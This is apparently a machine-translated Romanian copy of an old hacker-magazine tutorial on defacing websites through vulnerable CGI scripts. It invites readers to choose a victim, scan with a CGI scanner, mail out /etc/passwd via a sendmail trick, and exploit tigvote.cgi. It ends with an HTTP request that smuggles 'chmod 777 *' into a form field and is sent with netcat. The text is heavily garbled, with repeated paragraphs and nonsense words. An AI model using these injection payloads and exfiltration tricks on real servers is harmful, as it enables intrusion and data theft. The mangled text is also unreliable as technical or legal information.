Hacking (desfigurare) - hacking și desfigurare de site-uri -% ifth1% 0% -% ifen1% 0% - Publisher - Personal site
Aici trebuie să fie în mod constant citiți revista noastră (Hacker) și cred că: „Cu toate acestea, nu e pentru mine, e prea complicat și acest lucru nu este clar ...“ Dar acum este momentul în care vă vom spune cum puteți rapid și fără prea strecurat pentru a sparge orice servak. Ei bine, noi te intrigat? Dacă da, atunci citiți mai departe, nimic complicat în acest articol nu este, și dacă sunteți chiar ușor imagina modul în care serverul se execută, și un pic familiarizat cu C iliPerl, vă imediat se va ocupa de toate acestea și va fi o adevărată haksorom rece.
Astăzi, lucruri, cum ar fi cărțile de oaspeți, serverul de căutare, formularul pentru trimiterea de mesaje - un atribut important al aproape orice site majore. Ce gravă, acum chiar și pe paginile de acasă încerca să se ghiftui cât mai mult posibil toate tipurile de chestionare, vot, etc. ).
Pentru început, cred, este necesar să se înțeleagă conceptele (dezasamblarea generală și concepte - astăzi este foarte important :). CGI-script - un program care ruleaza pe serverul de web al cererii clientului. Un client, după cum știți - este nimeni altul ca tine;). acest program este fundamental diferit de programele obișnuite pe care sunt instalate pe computer - fie că este vorba Word sau Quake. CGI - acest lucru nu este un limbaj de programare, în care script-ul este scris, și interfață comună Gateway - o interfață specială prin care există un script de a alerga și de a interacționa cu acesta.
Cum CGI-script? Desigur, eu pot stoarce niște îndrumări tehnice, dar beneficiile acest lucru nu va fi suficient. Prin urmare, pentru a explica modul în care se întâmplă, pe degete. Deci, pagina un vizitator completează un câmp de formular, de exemplu, pentru a scrie în cartea de oaspeți. După aceea el face clic pe butonul „Submit“ (sau oricare alta, de exemplu, „E-mail“), care ruleaza cgi-script. Script-ul efectuează acțiunile programate - în acest caz, citește datele din formularul și să le scrie în fișierul de carte de oaspeți - și trimite-ul simplu HTML-cod browser-ul, de exemplu, mesajul: „Omule, ești liber Se face așteaptă prietena ...“
Dacă rupe ceva și cazul merge în instanță, vă confruntați:
1. Accesul neautorizat la dreptul protejat de informații de calculator, și anume informațiile privind operatorul de transport a mașinii, în calculator electronic (PC),
2. Același act comis de către un grup de persoane prin acord prealabil sau a unui grup organizat sau de o persoană care utilizează poziția sa oficială, precum și a avea acces la un computer, sistem informatic sau de rețea - se pedepsește cu amendă de la cinci sute la opt sute de ori mai mare decât salariul minim sau salariul sau alte venituri, pentru o perioadă de cinci până la opt luni, sau muncă corecțională pentru un termen de unu la doi de ani sau închisoare pe un termen de trei pana la sase luni, sau închisoare de până la cinci litri a.
Obiectivul general al CGI script-uri - pentru a vă permite să accesați doar o anumită parte a datelor stocate pe server. O astfel de definiție ar trebui să aducă imediat la ideea că poți într-un fel de a avea acces și la toate informațiile de pe server. Nici un server nu pot fi considerate 100% sigure (break si ***. Gov). Cea mai comună vulnerabilitate - este lipsa de controale trimise la datele scriptului pe meta-caractere (cum ar fi, de exemplu, cum ; `„“| *.
<> * () [] <> $), Ceea ce conduce la un scenariu fișier sau conținutul fișierului în sine. Soluție elementară a acestei probleme, există un set de filtrare de caractere de intrare, în căutarea naPerl urmează:
Cred ca oamenii care scriu scripturi - destul de leneș și să uitați despre ea sau nu doresc să-și amintească, pentru că testul cel mai de bază pentru caracterele „/“ și „..“ încă nu, și apoi, odată ce a ajuns la dumneavoastră un server, consultați „] [/ - | Acum cred că ești un pic imagina server și CGI-script-uri. Este timpul să-ți explic că acest exploata. Exploit ( „calc“ din engleză „exploatare“) - este o vulnerabilitate pentru care a proiectat o anumită metodă de atac. Multe exploit sunt publicate in surse deschise, și devreme sau mai târziu, pentru ei sunt „patch-uri“ (patch-uri), eliminând vulnerabilitatea. Să sperăm că administratorul site-ului pe care doriți să rupă, leneș, și nu va pune nici un patch-uri. Trebuie să spun că cele mai frecvente erori sunt: 1. Performanța echipei. 3. programele. 4 greseli sendmail. 5. atac DoS pe un scenariu. Bug în sendmail va ajuta să stăpânească un server asa. Rularea sendmail sendmail [email protected] -f, Bună, pipiska.txt. Această comandă va trimite pe dosarul meu de săpun pipiska.txt. Firește, în loc de pipiska.txt mai bine pentru a comanda fișierul / etc / passwd :). Deci, sper că am suficient pregătit teoretic și acum poți să faci ceva mai mult sau mai puțin utile. În primul rând trebuie să decidă dacă aveți nevoie de ea sau nu? Dacă este necesar, pentru a alege o victimă, vreau doar să avertizeze: nu încercați să rupă orice www.vvp.ru și www.nasa.gov, deoarece Departamentul de „P“ în țara noastră nu este adormit, și apoi toată vina pe mine :). În cazul în care victima a fost deja selectată, apoi du-te și descărca CGI-scanner. Nu știi ce este? Apoi trebuie să specială # 11 (22), în cazul în care am dat o imagine de ansamblu comparativă a CGI mai convenabil si yuzaemyh - verificator. O să-ți arăt totul pe exemplu VoidEye2k. Deci, cu setările pe care le le va înțelege, interfața este clară și copil. Solicităm un server și așteptați câteva minute). Deci, atunci când scanează www.kronex.ru găsit tigvote.cgi script. „Și ce?“ - ai spus. Iar faptul că acum rula pe www.void.ru, uita-te în cazul în care articolul „CGI-ZHUKS - în detaliu și în limba rusă,“ și uite acolo exploata. am citit: Locul: /cgi-bin/tigvote.cgi (doar în cazul în care am găsit). Acest script vă permite să organizați un vot pe site-ul, precum și numele de fișier în baza de date de voce este transmis script-ul ca un parametru. O examinare atentă a codului sursă de script-ul, puteți găsi un loc pentru a citi datele din formular sa întâmplat și atribuirea anumitor nume de fișier variabil: După cum puteți vedea, nu există nici un control asupra diferitelor personaje, inclusiv | /. Trecând mai departe, vom vedea dosarul deschis linie, „$ FILENAME“;. Nu există nici un tratament standard al șirului trecut, și toate caractere non-alfanumerice sunt trimise la UUEncode, prin urmare, browser-ul va nu va putea efectua exploatarea acestei vulnerabilități. Următorul este un exemplu de interogare care va executa comanda echo Hi pe victima gazdă. Pentru a oferi o astfel de cerere poate fi, de exemplu, netkatom (aproape aceeași tOlnet): [[email protected]] zapros $ pisică Asta e tot;). Ai crezut că a fost greu? Se pare că nu există nici un loc mai bun;). Dar trebuie avut în vedere faptul că numărul de servakov cu scripturi neetanșe scade (ma refer la cei servaki care sunt distractiv de a sparge, nu www.vasiapupkin.h1.ru). Dacă aveți orice întrebări suplimentare, săpunurile mele sunt mereu deschise pentru tine. Dar acum este momentul când vă vom spune cum puteți rapid și fără prea strecurat pentru a sparge orice servak. Cum CGI-script? Desigur, pot să vă stoarce unele de orientare tehnică, dar beneficiile acest lucru nu va fi suficient. Prin urmare, pentru a explica modul în care se întâmplă, pe degete. Asta e tot;). Ai crezut că a fost greu? Se pare că nu există nici un loc mai bun;). Dar trebuie avut în vedere că numărul de servakov cu scripturi neetanșe scade (ma refer la cei servaki care sunt distractiv de a sparge, nu www.vasiapupkin.h1.ru). n Tagil matrimoniale
POST /cgi-bin/tigvote.cgi HTTP / 1.1
Accept: * / *
Accept-Language: ru
Content-Type: application / x-www-form-urlencoded
Accept-Encoding: gzip, dezumfle
User-Agent: Agent Smith
Realizator: www.kronex.ru
Conținut-Lungime: 33
Conexiune: Păstrați-Alive
file = chmod 777 * | tigvote = cho + hi
[[email protected]] nc $ www.victim.com